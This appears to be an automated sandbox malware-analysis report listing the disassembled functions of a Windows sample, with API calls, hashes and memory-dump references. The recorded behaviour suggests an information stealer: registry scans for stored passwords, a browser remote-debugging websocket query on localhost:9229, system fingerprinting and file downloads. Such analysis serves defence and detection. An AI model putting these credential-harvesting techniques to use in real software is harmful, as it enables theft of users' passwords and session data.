                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Internet$Open$CloseHandle
                                                                                                                                                                                                                                                                                                                                  • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3289985339-2144369209
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 170f34314a9a50de4dc5ee84ba35aa8bb061ee5a30c9fc0fe8f8ec154b18fd50
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 65c64d5f42ab2d525f7f9866baa54bb10b69c20dcdde589055b7f2aa2564e8b2
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 170f34314a9a50de4dc5ee84ba35aa8bb061ee5a30c9fc0fe8f8ec154b18fd50
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C0414B35A10258EBCB14EB90DC85FDD7774BB48340F1041AAF505BA191DBB8AEC0CF68
                                                                                                                                                                                                                                                                                                                                  Function 00407630 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00407330: memset.MSVCRT ref: 00407374
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00407330: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,00407CF0), ref: 0040739A
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00407330: RegEnumValueA.ADVAPI32(00407CF0,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00407411
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00407330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040746D
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00407330: GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004074B2
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00407330: HeapFree.KERNEL32(00000000,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004074B9
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(273C7020,0042192C,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?,?,00416414), ref: 00407666
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(273C7020,00000000,00000000), ref: 004076A8
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(273C7020, : ), ref: 004076BA
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(273C7020,00000000,00000000,00000000), ref: 004076EF
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(273C7020,00421934), ref: 00407700
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(273C7020,00000000,00000000,00000000), ref: 00407733
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(273C7020,00421938), ref: 0040774D
                                                                                                                                                                                                                                                                                                                                  • task.LIBCPMTD ref: 0040775B
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                                                                                                                                                                                                                                                                                                                                  • String ID: :
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3191641157-3653984579
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: e57e9b9138bb8027498d080aed9d038d47843b59d4143be9cd15c4335821ddef
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 7dd5c8f6c25e89eb5421da9b581f9cff4d94f04832d352fdfe902425259828cd
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e57e9b9138bb8027498d080aed9d038d47843b59d4143be9cd15c4335821ddef
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B73164B1E05114DBDB04EBA0DD55DFE737AAF48305B50411EF102772E0DA38AA85CB96
                                                                                                                                                                                                                                                                                                                                  Function 00407330 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 149registrymemoryCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00407374
                                                                                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,00407CF0), ref: 0040739A
                                                                                                                                                                                                                                                                                                                                  • RegEnumValueA.ADVAPI32(00407CF0,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00407411
                                                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0040746D
                                                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004074B2
                                                                                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,00407CF0,80000001,00416414,?,?,?,?,?,00407CF0,?), ref: 004074B9
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00409290: vsprintf_s.MSVCRT ref: 004092AB
                                                                                                                                                                                                                                                                                                                                  • task.LIBCPMTD ref: 004075B5
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Heap$EnumFreeOpenProcessValuememsettaskvsprintf_s
                                                                                                                                                                                                                                                                                                                                  • String ID: Password
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2698061284-3434357891
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 3a3dd591c7cbb0d90e152054b3ac75d8c6492caf44e892e450b93b3cf6805213
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 394e2b55a83f95d9b644045a39dee7934e13af239b1baa97d0343fed5997f3db
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3a3dd591c7cbb0d90e152054b3ac75d8c6492caf44e892e450b93b3cf6805213
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 43611EB5D041689BDB24DB50CC41BDAB7B8BF54304F0081EAE649A6181EF746FC9CF95
                                                                                                                                                                                                                                                                                                                                  Function 00417690 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004176D2
                                                                                                                                                                                                                                                                                                                                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041770F
                                                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00417793
                                                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 0041779A
                                                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 004177D0
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                                                                                                                                                                                                                                                                                                                  • String ID: :$C$\
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3790021787-3809124531
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: f3303551fac9e6a7258c8f62e0777a03a8e3c9ba12f0dcc786fa477c370e4720
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 56630df3f9a1121e358c86d43682af9e85f8bbcd47ea8763ba8f74f533c9f43c
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f3303551fac9e6a7258c8f62e0777a03a8e3c9ba12f0dcc786fa477c370e4720
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8541B6B1D05358DBDB10DF94CC45BDEBBB8AF48704F10009AF509A7280D7786B84CBA9
                                                                                                                                                                                                                                                                                                                                  Function 00418290 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,007A05F0,00000000,?,00420E14,00000000,?,00000000), ref: 004182C0
                                                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,007A05F0,00000000,?,00420E14,00000000,?,00000000,00000000), ref: 004182C7
                                                                                                                                                                                                                                                                                                                                  • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 004182E8
                                                                                                                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 00418302
                                                                                                                                                                                                                                                                                                                                  • __aulldiv.LIBCMT ref: 00418310
                                                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 0041833C
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                                                                                                                                                                                                                                                                                                                                  • String ID: %d MB$@
                                                                                                                                                                                                                                                                                                                                  • API String ID: 2886426298-3474575989
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: d0391a1658ec30498705cc8c9cee2c4097af9c2ce960180bd43284ebda5957a4
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 389ef6515a1f2427be64b00d9458de7be2b91b0079cd17c5d853587b1d371e56
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d0391a1658ec30498705cc8c9cee2c4097af9c2ce960180bd43284ebda5957a4
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B214AF1E44218ABDB00DFD5DD49FAEBBB9FB44B04F10450AF615BB280D77969008BA9
                                                                                                                                                                                                                                                                                                                                  Function 004060F0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
                                                                                                                                                                                                                                                                                                                                  • InternetOpenA.WININET(00420DFB,00000001,00000000,00000000,00000000), ref: 0040615F
                                                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,007A20A8), ref: 00406197
                                                                                                                                                                                                                                                                                                                                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 004061DF
                                                                                                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00406203
                                                                                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00412DB1,?,00000400,?), ref: 0040622C
                                                                                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040625A
                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,00000400), ref: 00406299
                                                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00412DB1), ref: 004062A3
                                                                                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 004062B0
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 4287319946-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 8838836db31025382ca844f331f40524fc816d9838fcc273a41384e32388c86b
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 62bae03b9e4771e022f65dfe0b744ca25a6527e7e90d195df508867c32b8ef77
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8838836db31025382ca844f331f40524fc816d9838fcc273a41384e32388c86b
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CD5184B1A01218ABDB20EF90DC45FEE7779AB44305F0041AEF605B71C0DB786A95CF59
                                                                                                                                                                                                                                                                                                                                  Function 00417350 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 0041735E
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(001FFFFF,00000000,0041758D,004205C5), ref: 0041739C
                                                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 004173EA
                                                                                                                                                                                                                                                                                                                                  • ??_V@YAXPAX@Z.MSVCRT(?), ref: 0041753E
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0041740C
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: OpenProcesslstrcpymemset
                                                                                                                                                                                                                                                                                                                                  • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                                                                                                                                                                                                                                                                                                                  • API String ID: 224852652-4138519520
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 70a52f45e8fed91075f6e40efe57b784faee37a9ec6ea1346af3dcff18f6eb62
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 233c3b8a05bec9dd0facad4523d46c30dcb6cb295cabbf2d5ddda9a1061df09f
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 70a52f45e8fed91075f6e40efe57b784faee37a9ec6ea1346af3dcff18f6eb62
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 24515FB0D04218ABDB14EF91DC45BEEB7B5AF04305F1041AEE21567281EB786AC8CF59
                                                                                                                                                                                                                                                                                                                                  Function 0040BA50 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
